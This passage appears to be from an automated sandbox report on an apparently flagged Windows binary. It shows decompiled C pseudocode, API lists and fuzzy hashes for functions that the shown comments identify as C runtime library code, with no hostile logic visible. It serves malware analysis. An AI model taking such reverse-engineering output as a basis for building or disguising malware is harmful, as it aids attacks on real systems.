                						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t133);
                							goto L8;
                						} else {
                							if(_t133 >= _v40) {
                								_t131 = _v48;
                								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                							} else {
                								_t111 = E00407222( &_v28, _t133, 2);
                								_t139 = _t139 + 0xc;
                								if(_t111 != 0xffffffff) {
                									_t133 =  &(_t133[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t128 = _t123 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                						_push(2);
                						_v15 = _t128;
                						 *(_t129 + _t115 + 0x2d) = _t128;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t93 = E00407222();
                						_t139 = _t139 + 0xc;
                						if(_t93 != 0xffffffff) {
                							L9:
                							_t133 =  &(_t133[1]);
                							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t96;
                							if(_t96 != 0) {
                								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                									L19:
                									 *_t136 = GetLastError();
                								} else {
                									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t104 = 0xd;
                											_v32 = _t104;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				E004018CC();
                				return _t136;
                			}

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _t10;
                				int _t12;
                				int _t18;
                				signed int _t20;
                
                				_t10 =  *0x412014; // 0x230c200f
                				_v8 = _t10 ^ _t20;
                				_v12 = _v12 & 0x00000000;
                				_t12 =  &_v12;
                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                				if(_t12 != 0) {
                					_t12 = GetProcAddress(_v12, "CorExitProcess");
                					_t18 = _t12;
                					if(_t18 != 0) {
                						E0040C15C();
                						_t12 =  *_t18(_a4);
                					}
                				}
                				if(_v12 != 0) {
                					_t12 = FreeLibrary(_v12);
                				}
                				E004018CC();
                				return _t12;
                			}

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                				signed int _v8;
                				signed int _v12;
                				void* _v24;
                				signed int _t54;
                				void* _t56;
                				signed int _t58;
                				signed int _t60;
                				signed int _t64;
                				signed int _t68;
                				intOrPtr _t76;
                				signed int _t79;
                				signed int _t85;
                				signed int _t88;
                				void* _t93;
                				void* _t94;
                				intOrPtr _t96;
                				signed int _t99;
                				intOrPtr _t101;
                				signed int _t103;
                				signed int _t104;
                				signed int _t105;
                				void* _t108;
                
                				_push(__ecx);
                				_push(__ecx);
                				_v8 =  *0x412014 ^ _t104;
                				_t101 = _a20;
                				if(_t101 > 0) {
                					_t76 = E004080DB(_a16, _t101);
                					_t108 = _t76 - _t101;
                					_t4 = _t76 + 1; // 0x1
                					_t101 = _t4;
                					if(_t108 >= 0) {
                						_t101 = _t76;
                					}
                				}
                				_t96 = _a32;
                				if(_t96 == 0) {
                					_t96 =  *((intOrPtr*)( *_a4 + 8));
                					_a32 = _t96;
                				}
                				_t54 =  *0x40c0d4(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					E004018CC();
                					return _t54;
                				} else {
                					_t93 = _t54 + _t54;
                					_t83 = _t93 + 8;
                					asm("sbb eax, eax");
                					if((_t93 + 0x00000008 & _t54) == 0) {
                						_t79 = 0;
                						__eflags = 0;
                						L14:
                						if(_t79 == 0) {
                							L36:
                							_t103 = 0;
                							L37:
                							E004063D5(_t79);
                							_t54 = _t103;
                							goto L38;
                						}
                						_t56 =  *0x40c0d4(_t96, 1, _a16, _t101, _t79, _v12);
                						_t119 = _t56;
                						if(_t56 == 0) {
                							goto L36;
                						}
                						_t98 = _v12;
                						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                						_t103 = _t58;
                						if(_t103 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t94 = _t103 + _t103;
                							_t85 = _t94 + 8;
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							__eflags = _t85 & _t58;
                							if((_t85 & _t58) == 0) {
                								_t99 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t99;
                								if(__eflags == 0) {
                									L35:
                									E004063D5(_t99);
                									goto L36;
                								}
                								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                								__eflags = _t60;
                								if(_t60 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t103 =  *0x40c0d8(_a32, 0, _t99, _t103);
                								__eflags = _t103;
                								if(_t103 != 0) {
                									E004063D5(_t99);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t88 = _t94 + 8;
                							__eflags = _t94 - _t88;
                							asm("sbb eax, eax");
                							_t64 = _t58 & _t88;
                							_t85 = _t94 + 8;
                							__eflags = _t64 - 0x400;
                							if(_t64 > 0x400) {
                								__eflags = _t94 - _t85;
                								asm("sbb eax, eax");
                								_t99 = E00403E3D(_t85, _t64 & _t85);
                								_pop(_t85);
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L35;
                								}
                								 *_t99 = 0xdddd;
                								L28:
                								_t99 = _t99 + 8;
                								goto L30;
                							}
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							E004018E0();
                							_t99 = _t105;
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L35;
                							}
                							 *_t99 = 0xcccc;
                							goto L28;
                						}
                						_t68 = _a28;
                						if(_t68 == 0) {
                							goto L37;
                						}
                						_t123 = _t103 - _t68;
                						if(_t103 > _t68) {
                							goto L36;
                						}
                						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                						if(_t103 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t70 = _t54 & _t93 + 0x00000008;
                					_t83 = _t93 + 8;
                					if((_t54 & _t93 + 0x00000008) > 0x400) {
                						__eflags = _t93 - _t83;
                						asm("sbb eax, eax");
                						_t79 = E00403E3D(_t83, _t70 & _t83);
                						_pop(_t83);
                						__eflags = _t79;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t79 = 0xdddd;
                						L12:
                						_t79 = _t79 + 8;
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E004018E0();
                					_t79 = _t105;
                					if(_t79 == 0) {
                						goto L36;
                					}
                					 *_t79 = 0xcccc;
                					goto L12;
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: __freea$__alloca_probe_16
                • String ID:
                • API String ID: 3509577899-0
                • Opcode ID: f3441332840de4a7a0684e3d31edcaa551c2c35b623335f854193b075dd2ee1e
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: f3441332840de4a7a0684e3d31edcaa551c2c35b623335f854193b075dd2ee1e
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			// Library code, not sample logic (comment added in editing, not decompiler output):
                			// this matches the MS CRT's GetStringTypeA wrapper. MultiByteToWideChar is called
                			// once to size and once to convert, then GetStringTypeW classifies the result.
                			// The 0xcccc / 0xdddd words written at the buffer head are the CRT's _malloca
                			// stack/heap markers: a buffer of at most 0x400 bytes comes from the stack
                			// (__alloca_probe_16), a larger one from HeapAlloc, and E004063D5 is the matching
                			// _freea. The value read from 0x412014 is the stack cookie (/GS).
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				signed int _t34;
                				signed int _t40;
                				int _t45;
                				int _t52;
                				void* _t53;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t67;
                				short* _t71;
                				signed int _t72;
                				short* _t73;
                
                				_t34 =  *0x412014; // 0x230c200f
                				_v8 = _t34 ^ _t72;
                				_push(_t53);
                				E00403F2B(_t53,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t52 =  *(_v24 + 8);
                					_t57 = _t52;
                					_a24 = _t52;
                				}
                				_t67 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					E004018CC();
                					return _t67;
                				}
                				_t55 = _t40 + _t40;
                				_t17 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				if((_t17 & _t40) == 0) {
                					_t71 = 0;
                					L11:
                					if(_t71 != 0) {
                						E00402460(_t67, _t71, _t67, _t55);
                						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                						if(_t45 != 0) {
                							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                						}
                					}
                					L14:
                					E004063D5(_t71);
                					goto L15;
                				}
                				_t20 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				_t47 = _t40 & _t20;
                				_t21 = _t55 + 8; // 0x8
                				_t63 = _t21;
                				if((_t40 & _t20) > 0x400) {
                					asm("sbb eax, eax");
                					_t71 = E00403E3D(_t63, _t47 & _t63);
                					if(_t71 == 0) {
                						goto L14;
                					}
                					 *_t71 = 0xdddd;
                					L9:
                					_t71 =  &(_t71[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E004018E0();
                				_t71 = _t73;
                				if(_t71 == 0) {
                					goto L14;
                				}
                				 *_t71 = 0xcccc;
                				goto L9;
                			}
                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 1857427562-0
                • Opcode ID: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Library code (comment added in editing, not decompiler output): the CRT's
                			// _close_nolock. E00405D6E is _get_osfhandle; for fd 1 and fd 2 the handle is
                			// not closed when stdout and stderr share one OS handle, and on CloseHandle
                			// failure E004047FB (__dosmaperr) maps GetLastError to errno before returning -1.
                			E00409BDD(void* __eflags, signed int _a4) {
                				intOrPtr _t13;
                				void* _t21;
                				signed int _t33;
                				long _t35;
                
                				_t33 = _a4;
                				if(E00405D6E(_t33) != 0xffffffff) {
                					_t13 =  *0x4130a0; // 0x4e7928
                					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                							goto L7;
                						} else {
                							goto L6;
                						}
                					} else {
                						L6:
                						_t21 = E00405D6E(2);
                						if(E00405D6E(1) == _t21) {
                							goto L1;
                						}
                						L7:
                						if(CloseHandle(E00405D6E(_t33)) != 0) {
                							goto L1;
                						}
                						_t35 = GetLastError();
                						L9:
                						E00405CDD(_t33);
                						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                						if(_t35 == 0) {
                							return 0;
                						}
                						return E004047FB(_t35) | 0xffffffff;
                					}
                				}
                				L1:
                				_t35 = 0;
                				goto L9;
                			}
                0x00409be4
                0x00409bf1
                0x00409bf7
                0x00409bff
                0x00409c0d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00409c15
                0x00409c15
                0x00409c17
                0x00409c29
                0x00000000
                0x00000000
                0x00409c2b
                0x00409c3b
                0x00000000
                0x00000000
                0x00409c43
                0x00409c45
                0x00409c46
                0x00409c5e
                0x00409c65
                0x00000000
                0x00409c73
                0x00000000
                0x00409c6e
                0x00409bff
                0x00409bf3
                0x00409bf3
                0x00000000

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                • __dosmaperr.LIBCMT ref: 00409C68
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: (yN
                • API String ID: 2583163307-2793824354
                • Opcode ID: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                • Opcode Fuzzy Hash: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			// Library code (comment added in editing, not decompiler output): the CRT's
                			// try_get_module helper behind its Win32 API thunks. The first LoadLibraryExW
                			// passes flag 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32), so the DLL named in the
                			// table at 0x40cd48 is resolved from System32 only, not from the application
                			// directory; the plain LoadLibraryExW fallback runs only when the OS rejects that
                			// flag with ERROR_INVALID_PARAMETER (0x57), i.e. on older systems without the
                			// safe-search flags. Handles are cached at 0x412fc8, with -1 meaning "failed
                			// before", which the final return converts back to 0.
                			E00405751(signed int _a4) {
                				signed int _t9;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0x412fc8 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0x40cd48 + _t9 * 4);
                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0x230c2010
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}
                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			// Library code (comment added in editing, not decompiler output): the CRT's
                			// per-thread-data getter (__acrt_getptd). GetLastError is saved and restored
                			// around the lookup, the 0x364-byte block is allocated with calloc (E00403ECE)
                			// and stored with FlsSetValue (E004058CE), and _abort (E00403E8B) runs if that
                			// fails. The decompiler has merged two adjacent functions here: everything after
                			// asm("int3") is the non-aborting variant that returns 0 instead, starting at the
                			// register pushes that follow the int3 padding.
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_t36 = GetLastError();
                				_t2 =  *0x412064; // 0x7
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E00403ECE(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00404192(_t25, _t31, 0x4132a4);
                							E00403E03(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E00403E03();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E00403E8B(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0x412064; // 0x7
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E00403ECE(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E00404192(_t27, _t32, 0x4132a4);
                									E00403E03(_t21);
                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E00403E03();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E00405878(_t25, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E00405878(_t23, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                			}
                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Library code (comment added in editing, not decompiler output): VC runtime
                			// start-up (__vcrt_initialize); if the lock initialisation fails the locks are
                			// torn down again and 0 is returned.
                			E004025BA() {
                				void* _t4;
                				void* _t8;
                
                				E00402AE5();
                				E00402A79();
                				if(E004027D9() != 0) {
                					_t4 = E0040278B(_t8, __eflags);
                					__eflags = _t4;
                					if(_t4 != 0) {
                						return 1;
                					} else {
                						E00402815();
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}
                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
